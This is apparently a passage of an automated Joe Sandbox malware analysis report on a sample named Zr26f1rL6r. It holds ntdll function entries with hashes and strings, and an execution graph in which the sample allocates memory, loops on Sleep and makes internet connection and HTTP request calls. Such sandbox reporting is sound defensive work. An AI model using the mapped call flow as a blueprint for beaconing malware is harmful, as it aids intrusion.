                                                                                                                          • Opcode Fuzzy Hash: 825ac499b713df924ee7bb5164bc2f96dfeda84ef63275f78e28710cf8c949d9
                                                                                                                          • Instruction Fuzzy Hash: B7310376A04262AFDB11DF59CCC0E9A77BAEF84B00F54026DE901A7254E7B4A841CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 3446177414-3610490719
                                                                                                                          • Opcode ID: 942d885e107c6ce1d324745285cf739df5b6685245a3f118729fb3b8515ec0a2
                                                                                                                          • Instruction ID: 87a175cc9e8f33010d0dd0f92ec02eb556ae252826fa11810feb7746691c0611
                                                                                                                          • Opcode Fuzzy Hash: 942d885e107c6ce1d324745285cf739df5b6685245a3f118729fb3b8515ec0a2
                                                                                                                          • Instruction Fuzzy Hash: 55911335604785AFD716CB28CC90B2EB7AABF84A50F040B5DF8419B381DB35F884CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 3446177414-2283098728
                                                                                                                          • Opcode ID: fbb54ff90a3e16efed6e0ade52467faf13ec11d45946eba39ab5798dc220c36e
                                                                                                                          • Instruction ID: 60c6ea6679ddd3133b78d1dd7bc2eaee47c8c09697b295680b760338016d52c9
                                                                                                                          • Opcode Fuzzy Hash: fbb54ff90a3e16efed6e0ade52467faf13ec11d45946eba39ab5798dc220c36e
                                                                                                                          • Instruction Fuzzy Hash: DE5103716147429BC710DF38CC84E5977A6BB86714F180BACE8519BAE5E7B0F848CBD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 1E9380E2
                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 1E9380E9
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1E9380F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-1783798831
                                                                                                                          • Opcode ID: e187aaba01cbc4b174325e0cf9407c724c5129f322b939ca0a4c840b3637ce4d
                                                                                                                          • Instruction ID: 0388dd32d00e05e6a5b382a9553eaad80e29dca975228c0a630b2cae9201977e
                                                                                                                          • Opcode Fuzzy Hash: e187aaba01cbc4b174325e0cf9407c724c5129f322b939ca0a4c840b3637ce4d
                                                                                                                          • Instruction Fuzzy Hash: 2941B1B5518390EBC721DB68CD80F5B77E9AF84A10F104F2EF94897291EB34E900CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • LdrpCheckRedirection, xrefs: 1E94450F
                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 1E944519
                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E944508
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                          • API String ID: 3446177414-3154609507
                                                                                                                          • Opcode ID: ee8a75867bba5e1f905891e56a1c4d15f1eb1435e9564c1b66c1aefa4d8347e1
                                                                                                                          • Instruction ID: cb49536a4e95107583b63bee845b03f7374309452e4aecbe7b72967842393a00
                                                                                                                          • Opcode Fuzzy Hash: ee8a75867bba5e1f905891e56a1c4d15f1eb1435e9564c1b66c1aefa4d8347e1
                                                                                                                          • Instruction Fuzzy Hash: 2541E1326047699BCB12CF69CA90A1677EBBF88650B260B5DEC88D7355D730E800CF81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Wow64 Emulation Layer
                                                                                                                          • API String ID: 3446177414-921169906
                                                                                                                          • Opcode ID: 80de4a97739f2484adf3074cc3cd91f7b735f6d14d38c9fb68d12e8e16b0b3d1
                                                                                                                          • Instruction ID: 0d5a2f290dba6f8fd72c542d5eb8f98e094f51888d0077dfa1eda0477a243221
                                                                                                                          • Opcode Fuzzy Hash: 80de4a97739f2484adf3074cc3cd91f7b735f6d14d38c9fb68d12e8e16b0b3d1
                                                                                                                          • Instruction Fuzzy Hash: 75213A7690015DBFEB019BA4CD84EFF7B7DFF85299B150658FA01A2240E730AE01EB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: 5699a821849a518bd4c5ac5a141afac7759694e62a4fe31cb1eb6e23cb811875
                                                                                                                          • Instruction ID: ecf379925c2d8bbd054252fc64a80b780be99ea32ed05ff6f1e98e14a5fd1ad0
                                                                                                                          • Opcode Fuzzy Hash: 5699a821849a518bd4c5ac5a141afac7759694e62a4fe31cb1eb6e23cb811875
                                                                                                                          • Instruction Fuzzy Hash: F4710075E003299BDF05CFA4C884AEDBBB9FF48312F25462AE915BB250D734A942CF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: 54154252bf52e41bf6d88b6ea0a573df18c415345194a1846402713ef6902e56
                                                                                                                          • Instruction ID: 1b6acf69b4c4fee97823acf64efce82af7c724fce4dc0bd8a5c09ab94687c34b
                                                                                                                          • Opcode Fuzzy Hash: 54154252bf52e41bf6d88b6ea0a573df18c415345194a1846402713ef6902e56
                                                                                                                          • Instruction Fuzzy Hash: 1651AE70714A129FDF19CE19C8A4A19B7EAFF8A310B144A6DD906C7710DBB9EC41EF80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: 85e48f133c7c73cce640c7375a8fbe8f1e17fb272cdc43d9bbe5fac9eb2c0cbc
                                                                                                                          • Instruction ID: 1712288a95c9f0160e8aa910c52c08dbf378099cf8d748ca90844fa87a0eda48
                                                                                                                          • Opcode Fuzzy Hash: 85e48f133c7c73cce640c7375a8fbe8f1e17fb272cdc43d9bbe5fac9eb2c0cbc
                                                                                                                          • Instruction Fuzzy Hash: B35113B6E102199FDF05CFA9C840ADDBBB6BF88312F25822AE815BB250D7749941CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4281723722-0
                                                                                                                          • Opcode ID: 53b28c203899367e33ba501aaa33a0ca48237329c105ab2aa7d555e55e638378
                                                                                                                          • Instruction ID: e62d68bab54821bcdf1c9c70c121d1699445c38f175ce58d1a6e84eccf5ac810
                                                                                                                          • Opcode Fuzzy Hash: 53b28c203899367e33ba501aaa33a0ca48237329c105ab2aa7d555e55e638378
                                                                                                                          • Instruction Fuzzy Hash: 77311479E142689FCF15DFA8D884ADEBBB1EF88320F11462AE511B7390CB346900CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: c0c194d461bf430f7a8a3bb11c876357ecc3d034afd0c9523add841bbca596d6
                                                                                                                          • Instruction ID: 287f899e90f4b0e075df5c3e12d315542e54bc9a59e7f3d207cead7cd79db2f5
                                                                                                                          • Opcode Fuzzy Hash: c0c194d461bf430f7a8a3bb11c876357ecc3d034afd0c9523add841bbca596d6
                                                                                                                          • Instruction Fuzzy Hash: 033256749102AACFDF21CF65C844BDDBBB5BF0A304F0046E9D549A7281D7B4AA84DFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0$Flst
                                                                                                                          • API String ID: 0-758220159
                                                                                                                          • Opcode ID: fb2d4a851de30687d746e0a0707db538ddd07ebbe07baed547509c971ff8eda0
                                                                                                                          • Instruction ID: 2ed55afcf05d71a72bfa234d207a69e8f67ae43f8525c6c5a0aa1ec3f5978777
                                                                                                                          • Opcode Fuzzy Hash: fb2d4a851de30687d746e0a0707db538ddd07ebbe07baed547509c971ff8eda0
                                                                                                                          • Instruction Fuzzy Hash: E35199B1A10289CFDB25CFA9C48475DFBFAEF44715F24C62ED0499B284E7B09985CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • kLsE, xrefs: 1E8C05FE
                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8C0586
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                          • API String ID: 3446177414-2547482624
                                                                                                                          • Opcode ID: ff2ca9299c866754b7f0c7d7cdd771006c01136ac015f7fb09ca798f47a9b52a
                                                                                                                          • Instruction ID: 1f1aa9d0270efbbee3ec5c9fac2fd8a2785345b7048f56c4b045b6fd372623e7
                                                                                                                          • Opcode Fuzzy Hash: ff2ca9299c866754b7f0c7d7cdd771006c01136ac015f7fb09ca798f47a9b52a
                                                                                                                          • Instruction Fuzzy Hash: FE519DB1A1078ADFDB10DFA9C440AEBB7F9AF46344F004A2ED59597240E734E546CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: 0$0
                                                                                                                          • API String ID: 3446177414-203156872
                                                                                                                          • Opcode ID: a75de55fbc2c8a7514321c32129be9981fbcbc238113e4ddf6034db07c27d653
                                                                                                                          • Instruction ID: d95cbd86982e8d4db3afb45a490a5afa71a736ecdf184d5d9498a3ffa080c580
                                                                                                                          • Opcode Fuzzy Hash: a75de55fbc2c8a7514321c32129be9981fbcbc238113e4ddf6034db07c27d653
                                                                                                                          • Instruction Fuzzy Hash: 99415EB1608745AFC301CF29C444A5ABBE5BF89358F044A6EF588DB381D771E905CB96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:3%
                                                                                                                          Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                          Signature Coverage:1%
                                                                                                                          Total number of Nodes:1274
                                                                                                                          Total number of Limit Nodes:148

                                                                                                                          Graph

                                                                                                                          execution_graph 83289 417300 83292 41733b 83289->83292 83300 41a020 83289->83300 83291 41741c 83292->83291 83303 409b40 83292->83303 83296 4173a0 Sleep 83297 41738d 83296->83297 83297->83291 83297->83296 83312 416f30 83297->83312 83334 417130 83297->83334 83301 41a04d 83300->83301 83352 4187c0 83300->83352 83301->83292 83304 409b64 83303->83304 83305 409ba0 LdrLoadDll 83304->83305 83306 409b6b 83304->83306 83305->83306 83307 413e50 83306->83307 83308 413e5e 83307->83308 83309 413e6a 83307->83309 83308->83309 83359 4142d0 LdrLoadDll 83308->83359 83309->83297 83311 413fbc 83311->83297 83313 416f55 83312->83313 83315 416faf 83313->83315 83360 418c00 83313->83360 83330 417103 83315->83330 83365 418c70 83315->83365 83317 416ff0 83317->83330 83370 418cf0 83317->83370 83320 417037 83378 418d70 83320->83378 83321 417026 83373 418e50 83321->83373 83324 41702d 83324->83297 83325 4170e9 83326 418e50 2 API calls 83325->83326 83327 4170fc 83326->83327 83329 418e50 2 API calls 83327->83329 83328 417046 83328->83325 83383 418de0 LdrLoadDll 83328->83383 83329->83330 83330->83297 83332 4170b8 83332->83325 83384 418de0 LdrLoadDll 83332->83384 83335 4171a6 83334->83335 83336 418c00 2 API calls 83335->83336 83337 4171d0 83335->83337 83336->83337 83338 418c70 2 API calls 83337->83338 83351 4172ec 83337->83351 83339 41724c 83338->83339 83340 418cf0 LdrLoadDll 83339->83340 83339->83351 83341 417277 83340->83341 83342 417281 83341->83342 83345 417292 83341->83345 83343 418e50 2 API calls 83342->83343 83344 417288 83343->83344 83344->83297 83346 418d70 2 API calls 83345->83346 83347 4172c4 83346->83347 83348 418e50 2 API calls 83347->83348 83349 4172e5 83348->83349 83350 418e50 2 API calls 83349->83350 83350->83351 83351->83297 83355 4191e0 83352->83355 83354 4187dc NtAllocateVirtualMemory 83354->83301 83356 4191f0 83355->83356 83358 419212 83355->83358 83357 413e50 LdrLoadDll 83356->83357 83357->83358 83358->83354 83359->83311 83361 418c3a 83360->83361 83385 419290 83360->83385 83363 418c43 InternetOpenA 83361->83363 83364 418c5e 83361->83364 83363->83315 83364->83315 83366 419290 LdrLoadDll 83365->83366 83367 418caf 83366->83367 83368 418cb8 InternetConnectA 83367->83368 83369 418cdf 83367->83369 83368->83317 83369->83317 83371 41701d 83370->83371 83372 419290 LdrLoadDll 83370->83372 83371->83320 83371->83321 83372->83371 83374 418e92 83373->83374 83375 419290 LdrLoadDll 83373->83375 83376 418ea6 83374->83376 83377 418e9b InternetCloseHandle 83374->83377 83375->83374 83376->83324 83377->83324 83379 419290 LdrLoadDll 83378->83379 83380 418daf 83379->83380 83381 418dd3 83380->83381 83382 418db8 HttpSendRequestA 83380->83382 83381->83328 83382->83328 83383->83332 83384->83332 83386 41929c 83385->83386 83388 4192b1 83385->83388 83387 413e50 LdrLoadDll 83386->83387 83387->83388 83388->83361 83392 43a29f0 LdrInitializeThunk 83393 41d43d 83396 419c80 83393->83396 83397 419ca6 83396->83397 83404 408b60 83397->83404 83399 419cb2 83400 419cd6 83399->83400 83412 407e40 83399->83412 83444 418930 83400->83444 83447 408ab0 83404->83447 83406 408b74 83406->83399 83407 408b6d 83407->83406 83459 408a50 83407->83459 83413 407e67 83412->83413 83855 40a010 83413->83855 83415 407e79 83859 409d60 83415->83859 83417 407e96 83418 407e9d 83417->83418 83910 409c90 LdrLoadDll 83417->83910 83441 407fe4 83418->83441 83863 40d170 83418->83863 83421 407f06 83422 41a270 2 API calls 83421->83422 83421->83441 83423 407f1c 83422->83423 83424 41a270 2 API calls 83423->83424 83425 407f2d 83424->83425 83426 41a270 2 API calls 83425->83426 83427 407f3e 83426->83427 83875 40aed0 83427->83875 83429 407f51 83430 413a50 8 API calls 83429->83430 83431 407f62 83430->83431 83432 413a50 8 API calls 83431->83432 83433 407f73 83432->83433 83434 407f93 83433->83434 83887 40ba40 83433->83887 83436 413a50 8 API calls 83434->83436 83439 407fdb 83434->83439 83442 407faa 83436->83442 83893 407c70 83439->83893 83441->83400 83442->83439 83912 40bae0 6 API calls 83442->83912 83445 41894f 83444->83445 83446 4191e0 LdrLoadDll 83444->83446 83446->83445 83448 408ac3 83447->83448 83498 416e50 LdrLoadDll 83447->83498 83478 416d00 83448->83478 83451 408ad6 83451->83407 83452 408acc 83452->83451 83481 419530 83452->83481 83454 408b13 83454->83451 83492 4088d0 83454->83492 83456 408b33 83499 408320 LdrLoadDll 83456->83499 83458 408b45 83458->83407 83834 419820 83459->83834 83462 419820 LdrLoadDll 83463 408a7b 83462->83463 83464 419820 LdrLoadDll 83463->83464 83465 408a91 83464->83465 83466 40cf70 83465->83466 83467 40cf89 83466->83467 83838 409e90 83467->83838 83469 40cf9c 83842 418460 83469->83842 83472 408b85 83472->83399 83474 40cfc2 83475 40cfed 83474->83475 83848 4184e0 83474->83848 83477 418710 2 API calls 83475->83477 83477->83472 83500 418880 83478->83500 83482 419549 83481->83482 83503 413a50 83482->83503 83484 419561 83485 41956a 83484->83485 83542 419370 83484->83542 83485->83454 83487 41957e 83487->83485 83560 418180 83487->83560 83495 4088ea 83492->83495 83812 406e20 83492->83812 83494 4088f1 83494->83456 83495->83494 83825 4070e0 83495->83825 83498->83448 83499->83458 83501 416d15 83500->83501 83502 4191e0 LdrLoadDll 83500->83502 83501->83452 83502->83501 83504 413d85 83503->83504 83505 413a64 83503->83505 83504->83484 83505->83504 83568 417ed0 83505->83568 83508 413b90 83571 4185e0 83508->83571 83509 413b73 83628 4186e0 LdrLoadDll 83509->83628 83512 413bb7 83514 41a0a0 2 API calls 83512->83514 83513 413b7d 83513->83484 83516 413bc3 83514->83516 83515 413d49 83518 418710 2 API calls 83515->83518 83516->83513 83516->83515 83517 413d5f 83516->83517 83522 413c52 83516->83522 83637 413790 LdrLoadDll NtReadFile NtClose 83517->83637 83520 413d50 83518->83520 83520->83484 83521 413d72 83521->83484 83523 413cb9 83522->83523 83525 413c61 83522->83525 83523->83515 83524 413ccc 83523->83524 83630 418560 83524->83630 83527 413c66 83525->83527 83528 413c7a 83525->83528 83629 413650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83527->83629 83531 413c97 83528->83531 83532 413c7f 83528->83532 83531->83520 83586 413410 83531->83586 83574 4136f0 83532->83574 83534 413c70 83534->83484 83537 413d2c 83634 418710 83537->83634 83538 413c8d 83538->83484 83539 413caf 83539->83484 83541 413d38 83541->83484 83543 419381 83542->83543 83544 419393 83543->83544 83545 41a020 2 API calls 83543->83545 83544->83487 83546 4193b4 83545->83546 83657 413060 83546->83657 83548 419400 83548->83487 83549 4193d7 83549->83548 83550 413060 3 API calls 83549->83550 83551 4193f9 83550->83551 83551->83548 83689 414390 83551->83689 83553 41948a 83554 41949a 83553->83554 83783 419180 LdrLoadDll 83553->83783 83699 418ff0 83554->83699 83557 4194c8 83778 418140 83557->83778 83561 41819c 83560->83561 83562 4191e0 LdrLoadDll 83560->83562 83806 43a2b2a 83561->83806 83562->83561 83563 4181b7 83565 41a0a0 83563->83565 83809 4188f0 83565->83809 83567 4195d9 83567->83454 83569 413b44 83568->83569 83570 4191e0 LdrLoadDll 83568->83570 83569->83508 83569->83509 83569->83513 83570->83569 83572 4191e0 LdrLoadDll 83571->83572 83573 4185fc NtCreateFile 83572->83573 83573->83512 83575 41370c 83574->83575 83576 418560 LdrLoadDll 83575->83576 83577 41372d 83576->83577 83578 413734 83577->83578 83579 413748 83577->83579 83580 418710 2 API calls 83578->83580 83581 418710 2 API calls 83579->83581 83582 41373d 83580->83582 83583 413751 83581->83583 83582->83538 83638 41a2b0 83583->83638 83585 41375c 83585->83538 83587 41345b 83586->83587 83588 41348e 83586->83588 83589 418560 LdrLoadDll 83587->83589 83590 4135d9 83588->83590 83594 4134aa 83588->83594 83591 413476 83589->83591 83592 418560 LdrLoadDll 83590->83592 83593 418710 2 API calls 83591->83593 83597 4135f4 83592->83597 83595 41347f 83593->83595 83596 418560 LdrLoadDll 83594->83596 83595->83539 83598 4134c5 83596->83598 83656 4185a0 LdrLoadDll 83597->83656 83600 4134e1 83598->83600 83601 4134cc 83598->83601 83602 4134e6 83600->83602 83603 4134fc 83600->83603 83605 418710 2 API calls 83601->83605 83606 418710 2 API calls 83602->83606 83614 413501 83603->83614 83644 41a270 83603->83644 83604 41362e 83607 418710 2 API calls 83604->83607 83608 4134d5 83605->83608 83609 4134ef 83606->83609 83610 413639 83607->83610 83608->83539 83609->83539 83610->83539 83613 413567 83615 41357e 83613->83615 83655 418520 LdrLoadDll 83613->83655 83621 413513 83614->83621 83647 418690 83614->83647 83617 413585 83615->83617 83618 41359a 83615->83618 83619 418710 2 API calls 83617->83619 83620 418710 2 API calls 83618->83620 83619->83621 83622 4135a3 83620->83622 83621->83539 83623 4135cf 83622->83623 83650 419e70 83622->83650 83623->83539 83625 4135ba 83626 41a0a0 2 API calls 83625->83626 83627 4135c3 83626->83627 83627->83539 83628->83513 83629->83534 83631 4191e0 LdrLoadDll 83630->83631 83632 413d14 83631->83632 83633 4185a0 LdrLoadDll 83632->83633 83633->83537 83635 41872c NtClose 83634->83635 83636 4191e0 LdrLoadDll 83634->83636 83635->83541 83636->83635 83637->83521 83640 41a2ca 83638->83640 83641 4188b0 83638->83641 83640->83585 83642 4191e0 LdrLoadDll 83641->83642 83643 4188cc RtlAllocateHeap 83642->83643 83643->83640 83645 4188b0 2 API calls 83644->83645 83646 41a288 83645->83646 83646->83614 83648 4186ac NtReadFile 83647->83648 83649 4191e0 LdrLoadDll 83647->83649 83648->83613 83649->83648 83651 419e94 83650->83651 83652 419e7d 83650->83652 83651->83625 83652->83651 83653 41a270 2 API calls 83652->83653 83654 419eab 83653->83654 83654->83625 83655->83615 83656->83604 83658 413071 83657->83658 83659 413079 83657->83659 83658->83549 83688 41334c 83659->83688 83784 41b250 83659->83784 83661 4130cd 83662 41b250 2 API calls 83661->83662 83665 4130d8 83662->83665 83663 413126 83666 41b250 2 API calls 83663->83666 83665->83663 83667 41b380 3 API calls 83665->83667 83798 41b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 83665->83798 83668 41313a 83666->83668 83667->83665 83669 413197 83668->83669 83789 41b380 83668->83789 83670 41b250 2 API calls 83669->83670 83673 4131ad 83670->83673 83672 4131ea 83674 41b250 2 API calls 83672->83674 83673->83672 83675 41b380 3 API calls 83673->83675 83676 4131f5 83674->83676 83675->83673 83677 41b380 3 API calls 83676->83677 83683 41322f 83676->83683 83677->83676 83680 41b2b0 2 API calls 83681 41332e 83680->83681 83682 41b2b0 2 API calls 83681->83682 83684 413338 83682->83684 83795 41b2b0 83683->83795 83685 41b2b0 2 API calls 83684->83685 83686 413342 83685->83686 83687 41b2b0 2 API calls 83686->83687 83687->83688 83688->83549 83690 4143a1 83689->83690 83691 413a50 8 API calls 83690->83691 83692 4143b7 83691->83692 83693 4143f2 83692->83693 83694 414405 83692->83694 83698 41440a 83692->83698 83695 41a0a0 2 API calls 83693->83695 83696 41a0a0 2 API calls 83694->83696 83697 4143f7 83695->83697 83696->83698 83697->83553 83698->83553 83799 418eb0 83699->83799 83702 418eb0 LdrLoadDll 83703 41900d 83702->83703 83704 418eb0 LdrLoadDll 83703->83704 83705 419016 83704->83705 83706 418eb0 LdrLoadDll 83705->83706 83707 41901f 83706->83707 83708 418eb0 LdrLoadDll 83707->83708 83709 419028 83708->83709 83710 418eb0 